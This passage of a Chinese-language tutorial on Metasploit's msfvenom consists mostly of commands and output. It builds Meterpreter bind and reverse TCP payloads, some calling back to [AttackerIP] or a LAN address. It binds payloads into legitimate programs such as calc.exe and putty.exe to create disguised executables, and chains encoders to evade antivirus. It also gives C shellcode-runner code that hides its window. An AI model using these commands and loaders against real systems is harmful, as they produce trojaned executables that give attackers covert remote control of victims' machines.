Encoder<\/p>\n\n\n\n<p>x86\/alpha_upperlow&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Alpha2 Alphanumeric Uppercase Encoder<\/p>\n\n\n\n<p>x86\/avoid_underscore_tolowermanual&nbsp;&nbsp;&nbsp;&nbsp; Avoid underscore\/tolower<\/p>\n\n\n\n<p>x86\/avoid_utf8_tolowermanual&nbsp;&nbsp;&nbsp;&nbsp; Avoid UTF8\/tolower<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; x86\/bloxor&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; manual&nbsp;&nbsp;&nbsp;&nbsp; BloXor &#8211; A Metamorphic Block Based XOR Encoder<\/p>\n\n\n\n<p>x86\/bmp_polyglotmanual&nbsp;&nbsp;&nbsp;&nbsp; BMP Polyglot<\/p>\n\n\n\n<p>x86\/call4_dword_xornormal&nbsp;&nbsp;&nbsp;&nbsp; Call+4 Dword XOR Encoder<\/p>\n\n\n\n<p>x86\/context_cpuid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; manual&nbsp;&nbsp;&nbsp;&nbsp; CPUID-based Context Keyed Payload Encoder<\/p>\n\n\n\n<p>x86\/context_statmanual&nbsp;&nbsp;&nbsp;&nbsp; stat(2)-based Context Keyed Payload Encoder<\/p>\n\n\n\n<p>x86\/context_timemanual&nbsp;&nbsp;&nbsp;&nbsp; time(2)-based Context Keyed Payload Encoder<\/p>\n\n\n\n<p>x86\/countdown&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;normal&nbsp;&nbsp;&nbsp;&nbsp; Single-byte XOR Countdown Encoder<\/p>\n\n\n\n<p>x86\/fnstenv_movnormal&nbsp;&nbsp;&nbsp;&nbsp; Variable-length Fnstenv\/mov Dword XOR Encoder<\/p>\n\n\n\n<p>x86\/jmp_call_additivenormal&nbsp;&nbsp;&nbsp;&nbsp; Jump\/Call XOR Additive Feedback Encoder<\/p>\n\n\n\n<p>x86\/nonalpha&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;low&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Non-Alpha Encoder<\/p>\n\n\n\n<p>x86\/nonupperlow&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Non-Upper Encoder<\/p>\n\n\n\n<p>x86\/opt_submanual&nbsp;&nbsp;&nbsp;&nbsp; Sub Encoder (optimised)<\/p>\n\n\n\n<p>x86\/servicemanual&nbsp;&nbsp;&nbsp;&nbsp; Register Service<\/p>\n\n\n\n<p>x86\/shikata_ga_nai&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;excellent&nbsp; Polymorphic XOR Additive Feedback Encoder<\/p>\n\n\n\n<p>x86\/single_static_bitmanual&nbsp;&nbsp;&nbsp;&nbsp; Single Static Bit<\/p>\n\n\n\n<p>x86\/unicode_mixedmanual&nbsp;&nbsp;&nbsp;&nbsp; Alpha2 Alphanumeric Unicode Mixedcase Encoder<\/p>\n\n\n\n<p>x86\/unicode_uppermanual &nbsp;&nbsp;&nbsp;&nbsp;Alpha2 Alphanumeric Unicode Uppercase Encoder<\/p>\n\n\n\n<p>-x\u6307\u5b9a\u4e00\u4e2a\u6a21\u677f\u6587\u4ef6\uff08\u201c\u6346\u7ed1\u201dpayload\u5230\u8fd9\u4e2a\u6b63\u5e38\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff09<\/p>\n\n\n\n<p>msfvenom\u4f7f\u7528\u7684\u6a21\u677f\u6587\u4ef6\u4fdd\u5b58\u5728\u76ee\u5f55msf\/data\/templates<\/p>\n\n\n\n<p>-x calc.exe&nbsp;<br>\u6346\u7ed1\u6709\u6548\u8d1f\u8f7d\u5230\u6b63\u5e38\u6587\u4ef6\uff08\u6a21\u677f\u6587\u4ef6=\u5bbf\u4e3b\u6587\u4ef6=\u81ea\u5b9a\u4e49\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff09<\/p>\n\n\n\n<p>\u4f7f\u7528-x\u9009\u9879\u6307\u5b9a\u4f60\u81ea\u5df1\u7684\u6a21\u677f\u6587\u4ef6\uff08\u5982EXE\u7b49\uff09\uff0c\u5982\uff1a<br>\u4f7f\u7528\u7a97\u6237\u4e0b\u7684CALC.EXE\u4f5c\u4e3a\u6a21\u677f\u6587\u4ef6\uff0c\u751f\u6210\u6709\u6548\u8f7d\u8377\uff1a<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/bind_tcp -x calc.exe -f exe &gt; new.exe<\/p>\n\n\n\n<p>\u6ce8\u610f\uff0c\u5728win x64\u4e0b\u4f7f\u7528\u81ea\u5b9a\u4e49\u7684x64\u7684\u6a21\u677f\u6587\u4ef6\uff08\u5982exe\u7b49\uff09\u521b\u5efax64\u7684\u6709\u6548\u8f7d\u8377\u65f6\uff0c\u8f93\u51fa\u683c\u5f0f\u5fc5\u987b\u8981\u5199-f exe-only\u800c\u4e0d\u80fd\u5199-f exe<br>\uff08\u8bf7\u6ce8\u610f\uff1a\u5982\u679c\u60a8\u60f3\u521b\u5efa\u4e00\u4e2a\u5e26\u6709\u81ea\u5b9a\u4e49Windows\u7684x64\u81ea\u5b9a\u4e49\u6a21\u677f\uff0c\u7136\u540e\u800c\u4e0d\u662fexe\u683c\u5f0f\uff0c\u60a8\u5e94\u8be5\u4f7f\u7528exe-only \ud83d\ude42<\/p>\n\n\n\n<p>msfvenom -p windows\/x64\/meterpreter\/bind_tcp -x \/tmp\/templates\/64_calc.exe -f exe-only &gt; \/tmp\/fake_64_calc.exe<\/p>\n\n\n\n<p>-x\u9009\u9879\u7ecf\u5e38\u548c-k\u9009\u9879\u4e00\u8d77\u7528\uff0c\u5b83\u5141\u8bb8\u60a8\u4ece\u6a21\u677f\u4e2d\u5c06\u6709\u6548\u8f7d\u8377\u4f5c\u4e3a\u65b0\u7684\u7ebf\u7a0b\u8fd0\u884c\u3002\u4f46\u662f\u5b83\u76ee\u524d\u53ea\u652f\u6301\u8f83\u8001\u7684\u7cfb\u7edf\uff0c\u5982x86 Windows XP\u3002<br>\uff08-x\u6807\u5fd7\u901a\u5e38\u4e0e-k\u6807\u5fd7\u914d\u5bf9\uff0c\u8fd9\u4f7f\u60a8\u53ef\u4ee5\u5c06\u6a21\u677f\u4e2d\u7684\u6709\u6548\u8d1f\u8f7d\u4f5c\u4e3a\u65b0\u7ebf\u7a0b\u8fd0\u884c\u3002\u4f46\u662f\uff0c\u76ee\u524d\u8fd9\u53ea\u9002\u7528\u4e8e\u8f83\u65e7\u7684Windows\u673a\u5668\uff0c\u4f8b\u5982x86 Windows XP\u3002\uff09<\/p>\n\n\n\n<p>6.payload\u52a0\u7f16\u7801<\/p>\n\n\n\n<p>\u547d\u4ee4\u683c\u5f0f\uff1a<\/p>\n\n\n\n<p>msfvenom -p &lt;payload&gt; &lt;payload options&gt; -a &lt;arch&gt; &#8211;platform &lt;platform&gt; -e &lt;encoder option&gt; -i &lt;encoder times&gt; -b &lt;bad-chars&gt; -n &lt;nopsled&gt; -f &lt;format&gt; -o &lt;path&gt;<\/p>\n\n\n\n<p>\u5e38\u7528\u7f16\u7801\uff1a<\/p>\n\n\n\n<p>x86\/shikata_ga_nai<\/p>\n\n\n\n<p>cmd\/powershell_base64<\/p>\n\n\n\n<p>\u4f8b\u5b50\uff1a<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -i 3 -f exe &gt; 1.exe<\/p>\n\n\n\n<p>\u5982\u679c\u4f60\u4f7f\u7528\u4e86-b\u9009\u9879\uff08\u8bbe\u5b9a\u4e86\u89c4\u907f\u5b57\u7b26\u96c6\uff09\uff0c\u4f1a\u81ea\u52a8\u8c03\u7528\u7f16\u7801\u5668\u3002<br>\u5176\u4ed6\u60c5\u51b5\u4e0b\uff0c\u4f60\u9700\u8981\u4f7f\u7528-e\u9009\u9879\u6765\u4f7f\u7528\u7f16\u7801\u6a21\u5757\uff0c\u4f8b\u5982\uff1a<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -f raw<\/p>\n\n\n\n<p>\u53ef\u4ee5\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\uff0c\u6765\u67e5\u770b\u53ef\u7528\u7684\u7f16\u7801\u5668<\/p>\n\n\n\n<p>msfvenom -l encoders<\/p>\n\n\n\n<p>\u4f60\u4e5f\u53ef\u4ee5\u4f7f\u7528-i\u9009\u9879\u8fdb\u884c\u591a\u6b21\u7f16\u7801\u3002\u67d0\u4e9b\u60c5\u51b5\u4e0b\uff0c\u8fed\u4ee3\u7f16\u7801\u53ef\u4ee5\u8d77\u5230\u89c4\u907f\u6740\u6bd2\u8f6f\u4ef6\u7684\u4f5c\u7528\uff0c\u4f46\u4f60\u9700\u8981\u77e5\u9053\uff0c\u7f16\u7801\u5e76\u6ca1\u6709\u4f7f\u7528\u4e00\u4e2a\u771f\u6b63\u610f\u4e49\u4e0a\u7684AV\u89c4\u907f\u65b9\u6848\u3002<br>\u53ef\u4ee5\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u8fdb\u884c\u8fed\u4ee3\u7f16\u7801\uff1a<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -i 3<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/bind_tcp -b &#8216;\\x00&#8217; -f raw<\/p>\n\n\n\n<p>\uff081\uff09\u89c4\u907f\u7279\u6b8a\u5b57\u7b26&nbsp;-b &#8216;\/x00\u4e00\u4e2a\u7279\u6b8a\u5b57\u7b26\u5217\u8868&#8217;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>\u4f7f\u7528-b\u9009\u9879\u610f\u5473\u7740\u5728\u751f\u6210payload\u7684\u65f6\u5019\u5bf9\u67d0\u4e9b\u5b57\u7b26\u8fdb\u884c\u89c4\u907f\u3002\u5f53\u4f60\u4f7f\u7528\u8fd9\u4e2a\u9009\u9879\u7684\u65f6\u5019\uff0cmsfvenom\u4f1a\u81ea\u52a8\u7684\u4f7f\u7528\u5408\u9002\u7684\u7f16\u7801\u5668\u5bf9payload\u8fdb\u884c\u7f16\u7801\uff0c\u6bd4\u5982\uff1a<br>msfvenom -p windows\/meterpreter\/bind_tcp -b &#8216;\\x00&#8217; -f raw<\/p>\n\n\n\n<p>\u4e0d\u540c\u7684\u51fd\u6570\uff0c\u6709\u4e0d\u540c\u7684\u89c4\u907f\u5b57\u7b26\uff1a<br>\u5982gets\u5c31\u9700\u8981\u907f\u514d\/x0a<br>\u5982scanf\u66f4\u4e25\u683c\uff0c\u4e0d\u5141\u8bb8\u7a7a\u767d\u7b26<br>\u5982\u4ea7\u751f\u4e00\u6bb5exec\u7684shellcode<\/p>\n\n\n\n<p>\uff082\uff09\u7528-e\u9009\u9879\u6307\u5b9a\u7f16\u7801\u5668encoder<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -f raw<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 -e x86\/shikata_ga_nai -i 3 -f exe -o encoder.exe<\/p>\n\n\n\n<p>\u9ed8\u8ba4\u7684\u8f93\u51fa\u683c\u5f0f\u662fraw\uff0c\u76f4\u63a5\u8f93\u51fapayload\u7684\u5b57\u7b26\uff08\u542b\u4e71\u7801\uff09\uff0c\u5e38\u52a0\u53c2\u6570-o\u5199\u5230\u6587\u4ef6\u4e2d\u3002<\/p>\n\n\n\n<p>(3)\u4f7f\u7528-i\u9009\u9879\u8fdb\u884c\u591a\u6b21\u7f16\u7801<br>\u8fed\u4ee3\u7f16\u7801\u4e5f\u8bb8\u4f1a\u6709\u89c4\u907f\u6740\u6bd2\u8f6f\u4ef6\u7684\u4f5c\u7528\uff0c\u4f46\u8fd9\u4e0d\u662f\u771f\u6b63\u7684\u514d\u6740\u3002<\/p>\n\n\n\n<p>\u8fed\u4ee3\u7f16\u7801 \u4f8b\u5b50\uff1a<br>msfvenom -p windows\/meterpreter\/bind_tcp -e x86\/shikata_ga_nai -i 3<\/p>\n\n\n\n<p>(4)msf\u4e2d\u6240\u6709\u7684\u7f16\u7801\u5668<\/p>\n\n\n\n<p>msfvenom -l encoders<\/p>\n\n\n\n<p>Framework Encoders<\/p>\n\n\n\n<p>==================<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Rank&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Description<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; &#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#8212;&#8212;&#8212;&#8211;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; cmd\/echo&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; good&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Echo Command Encoder<\/p>\n\n\n\n<p>cmd\/generic_sh&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; manual&nbsp;&nbsp;&nbsp;&nbsp; Generic Shell Variable Substitution Command Encoder<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; cmd\/ifs&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; low&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Generic ${IFS} Substitution Command Encoder<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; cmd\/perl&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; normal&nbsp;&nbsp;&nbsp;&nbsp; Perl Command Encoder<\/p>\n\n\n\n<p>cmd\/powershell_base64excellent&nbsp; Powershell Base64 Command Encoder<\/p>\n\n\n\n<p>cmd\/printf_php_mqmanual&nbsp;&nbsp;&nbsp;&nbsp; printf(1) via PHP magic_quotes Utility Command Encoder<\/p>\n\n\n\n<p>generic\/eicarmanual&nbsp;&nbsp;&nbsp;&nbsp; The EICAR Encoder<\/p>\n\n\n\n<p>generic\/nonenormal&nbsp;&nbsp;&nbsp;&nbsp; The &#8220;none&#8221; Encoder<\/p>\n\n\n\n<p>mipsbe\/byte_xorinormal&nbsp;&nbsp;&nbsp;&nbsp; Byte XORi Encoder<\/p>\n\n\n\n<p>mipsbe\/longxornormal&nbsp;&nbsp;&nbsp;&nbsp; XOR Encoder<\/p>\n\n\n\n<p>mipsle\/byte_xorinormal&nbsp;&nbsp;&nbsp;&nbsp; Byte XORi Encoder<\/p>\n\n\n\n<p>mipsle\/longxornormal&nbsp;&nbsp;&nbsp;&nbsp; XOR Encoder<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; php\/base64&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; great&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; PHP Base64 Encoder<\/p>\n\n\n\n<p>ppc\/longxornormal&nbsp;&nbsp;&nbsp;&nbsp; PPC LongXOR Encoder<\/p>\n\n\n\n<p>ppc\/longxor_tagnormal&nbsp;&nbsp;&nbsp;&nbsp; PPC LongXOR Encoder<\/p>\n\n\n\n<p>sparc\/longxor_tagnormal&nbsp;&nbsp;&nbsp;&nbsp; SPARC DWORD XOR Encoder<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; x64\/xor&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; normal&nbsp;&nbsp;&nbsp;&nbsp; XOR Encoder<\/p>\n\n\n\n<p>x64\/zutto_dekirumanual&nbsp;&nbsp;&nbsp;&nbsp; Zutto Dekiru<\/p>\n\n\n\n<p>x86\/add_submanual&nbsp;&nbsp;&nbsp;&nbsp; Add\/Sub Encoder<\/p>\n\n\n\n<p>x86\/alpha_mixedlow&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Alpha2 Alphanumeric Mixedcase Encoder<\/p>\n\n\n\n<p>x86\/alpha_upperlow&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Alpha2 Alphanumeric Uppercase Encoder<\/p>\n\n\n\n<p>x86\/avoid_underscore_tolowermanual&nbsp;&nbsp;&nbsp;&nbsp; Avoid underscore\/tolower<\/p>\n\n\n\n<p>x86\/avoid_utf8_tolowermanual&nbsp;&nbsp;&nbsp;&nbsp; Avoid UTF8\/tolower<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; x86\/bloxor&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; manual&nbsp;&nbsp;&nbsp;&nbsp; BloXor &#8211; A Metamorphic Block Based XOR Encoder<\/p>\n\n\n\n<p>x86\/bmp_polyglotmanual&nbsp;&nbsp;&nbsp;&nbsp; BMP Polyglot<\/p>\n\n\n\n<p>x86\/call4_dword_xornormal&nbsp;&nbsp;&nbsp;&nbsp; Call+4 Dword XOR Encoder<\/p>\n\n\n\n<p>x86\/context_cpuidmanual&nbsp;&nbsp;&nbsp;&nbsp; CPUID-based Context Keyed Payload Encoder<\/p>\n\n\n\n<p>x86\/context_statmanual&nbsp;&nbsp;&nbsp;&nbsp; stat(2)-based Context Keyed Payload Encoder<\/p>\n\n\n\n<p>x86\/context_timemanual&nbsp;&nbsp;&nbsp;&nbsp; time(2)-based Context Keyed Payload Encoder<\/p>\n\n\n\n<p>x86\/countdownnormal&nbsp;&nbsp;&nbsp;&nbsp; Single-byte XOR Countdown Encoder<\/p>\n\n\n\n<p>x86\/fnstenv_movnormal&nbsp;&nbsp;&nbsp;&nbsp; Variable-length Fnstenv\/mov Dword XOR Encoder<\/p>\n\n\n\n<p>x86\/jmp_call_additivenormal&nbsp;&nbsp;&nbsp;&nbsp; Jump\/Call XOR Additive Feedback Encoder<\/p>\n\n\n\n<p>x86\/nonalphalow&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Non-Alpha Encoder<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; x86\/nonupper&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; low&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Non-Upper Encoder<\/p>\n\n\n\n<p>x86\/opt_submanual&nbsp;&nbsp;&nbsp;&nbsp; Sub Encoder (optimised)<\/p>\n\n\n\n<p>x86\/servicemanual&nbsp;&nbsp;&nbsp;&nbsp; Register Service<\/p>\n\n\n\n<p>x86\/shikata_ga_naiexcellent&nbsp; Polymorphic XOR Additive Feedback Encoder<\/p>\n\n\n\n<p>x86\/single_static_bitmanual&nbsp;&nbsp;&nbsp;&nbsp; Single Static Bit<\/p>\n\n\n\n<p>x86\/unicode_mixedmanual&nbsp;&nbsp;&nbsp;&nbsp; Alpha2 Alphanumeric Unicode Mixedcase Encoder<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; x86\/unicode_upper&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; manual&nbsp;&nbsp;&nbsp;&nbsp; Alpha2 Alphanumeric Unicode Uppercase Encoder<\/p>\n\n\n\n<p>(5)\u4f7f\u7528\u81ea\u5b9a\u4e49\u53ef\u6267\u884c\u6587\u4ef6\u6a21\u677f<\/p>\n\n\n\n<p>-x \u6307\u5b9a\u4e00\u4e2a\u6a21\u677f\u6587\u4ef6\uff08\u201c\u6346\u7ed1\u201cpayload\u5230\u8fd9\u4e2a\u6b63\u5e38\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff09<\/p>\n\n\n\n<p>\u9ed8\u8ba4\u7684msfvenom\u4f7f\u7528\u7684\u6a21\u677f\u6587\u4ef6\u4fdd\u5b58\u5728msf\/data\/templates\u76ee\u5f55\u4e2d\uff0c\u5982\u679c\u4f60\u60f3\u4f7f\u7528\u4f60\u81ea\u5df1\u7684\u6a21\u677f\u6587\u4ef6\uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528-x\u9009\u9879\u6765\u6307\u5b9a\uff0c\u6bd4\u5982\uff1a<br>\u6346\u7ed1payload\u5230 \u6b63\u5e38\u6587\u4ef6\uff08\u6a21\u677f\u6587\u4ef6=\u5bbf\u4e3b\u6587\u4ef6=\u81ea\u5b9a\u4e49\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff09\uff0c\u4f7f\u7528-x\u9009\u9879\u6307\u5b9a\u4f60\u81ea\u5df1\u7684\u6a21\u677f\u6587\u4ef6\uff08\u5982exe\u7b49\uff09\uff0c\u5982\uff1a\u4f7f\u7528windows\u4e0b\u7684calc.exe\u4f5c\u4e3a\u6a21\u677f\u6587\u4ef6,\u751f\u6210payload\uff1a<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/bind_tcp -x calc.exe -f exe &gt; new.exe<\/p>\n\n\n\n<p>\u8fd9\u4e2a\u547d\u4ee4\u5c06\u4f7f\u7528windows\u4e0b\u8ba1\u7b97\u5668\u7a0b\u5e8f\uff08calc.exe\uff09\u4f5c\u4e3a\u53ef\u6267\u884c\u6587\u4ef6\u7684\u6a21\u677f\u751f\u6210payload\u3002<\/p>\n\n\n\n<p>\u6ce8\u610f\uff0c\u5728win x64\u4e0b\u4f7f\u7528\u81ea\u5b9a\u4e49\u7684x64\u7684\u6a21\u677f\u6587\u4ef6\uff08\u5982exe\u7b49\uff09\u521b\u5efax64\u7684payload\u65f6\uff0c\u8f93\u51fa\u683c\u5f0f\u5fc5\u987b\u8981\u5199-f exe-only\u800c\u4e0d\u80fd\u5199-f exe<br>msfvenom -p windows\/x64\/meterpreter\/bind_tcp -x \/tmp\/templates\/64_calc.exe -f exe-only &gt; \/tmp\/fake_64_calc.exe<\/p>\n\n\n\n<p>-x\u9009\u9879\u7ecf\u5e38\u548c-k\u9009\u9879\u4e00\u8d77\u7528\uff0c\u5b83\u5141\u8bb8\u60a8\u4ece\u6a21\u677f\u4e2d\u5c06payload\u4f5c\u4e3a\u65b0\u7684\u7ebf\u7a0b\u8fd0\u884c\u3002\u4f46\u662f\u5b83\u76ee\u524d\u53ea\u652f\u6301\u8f83\u8001\u7684\u7cfb\u7edf\uff0c\u5982x86 Windows XP.<\/p>\n\n\n\n<p>(6)How to chain msfvenom output<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86\/shikata_ga_nai -i 5 | \\<\/p>\n\n\n\n<p>msfvenom -a x86 &#8211;platform windows -e x86\/countdown -i 8&nbsp; -f raw | \\<\/p>\n\n\n\n<p>msfvenom -a x86 &#8211;platform windows -e x86\/shikata_ga_nai -i 9 -f exe -o payload.exe<\/p>\n\n\n\n<p>(7)\u7f16\u8bd1\u751f\u6210\u7684C\u6587\u4ef6<\/p>\n\n\n\n<p>#win x86\u751f\u6210c\u6587\u4ef6<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/reverse_tcp lhost=[AttackerIP] lport=4444 -f c -e x86\/shikata_ga_nai -i 12 -b &#8216;\\x00&#8217;<\/p>\n\n\n\n<p>#vc++6.0 \u7f16\u8bd1\uff08\u542bbuf\u6570\u7ec4\u7684\uff09C\u4ee3\u7801\uff1a<\/p>\n\n\n\n<p>#include &lt;stdio.h&gt;<\/p>\n\n\n\n<p>#pragmacomment( linker, &#8220;\/subsystem:\\&#8221;windows\\&#8221; \/entry:\\&#8221;mainCRTStartup\\&#8221;&#8221;)\/\/\u8fd0\u884c\u65f6\u4e0d\u663e\u793a\u7a97\u53e3<\/p>\n\n\n\n<p>unsignedchar buf[] =<\/p>\n\n\n\n<p>&#8220;buf\u6570\u7ec4&#8221;;\/\/\u590d\u5236\u6570\u7ec4\u5185\u5bb9\u7c98\u8d34\u5230\u6b64\u5904<\/p>\n\n\n\n<p>main()<\/p>\n\n\n\n<p>{<\/p>\n\n\n\n<p>((void(*)(void))&amp;buf)();<\/p>\n\n\n\n<p>}<\/p>\n\n\n\n<p>#VS \u7f16\u8bd1\uff1a<\/p>\n\n\n\n<p>main()<\/p>\n\n\n\n<p>{<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; memcpy(Memory, buf, sizeof(buf));<\/p>\n\n\n\n<p>((void(*)())Memory)();<\/p>\n\n\n\n<p>}<\/p>\n\n\n\n<p><a href=\"http:\/\/i.imgur.com\/U7Dl3u5.png\">7.\u6ce8\u5165exe\u578b+\u7f16\u7801<\/a><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msfvenom -p &lt;payload&gt; &lt;payload options&gt; -a &lt;arch&gt; --plateform &lt;platform&gt; -e &lt;encoder option&gt; -i &lt;encoder times&gt; -x &lt;template&gt; -k &lt;keep&gt; -f &lt;format&gt; -o &lt;path&gt;<\/code><\/pre>\n\n\n\n<p><a href=\"http:\/\/i.imgur.com\/U7Dl3u5.png\">\u6d4b\u8bd5\uff1a<\/a><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&gt; msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 -e x86\/shikata_ga_nai -i 3 -x 'F:\/putty.exe' -f exe -o injection.exe<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&nbsp;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>DL is deprecated, please use Fiddle<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>No platform was selected, choosing Msf::Module::Platform::Windows from the payload<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Found 1 compatible encoders<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Attempting to encode payload with3 iterations of x86\/shikata_ga_nai<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>x86\/shikata_ga_nai succeeded with size 360 (iteration=0)<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>x86\/shikata_ga_nai succeeded with size 387 (iteration=1)<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>x86\/shikata_ga_nai succeeded with size 414 (iteration=2)<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>x86\/shikata_ga_nai chosen with final size 414<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Payload size: 414 bytes<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Final size of exe file: 6144 bytes<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Saved as: injection.exe<\/code><\/pre>\n\n\n\n<p><a 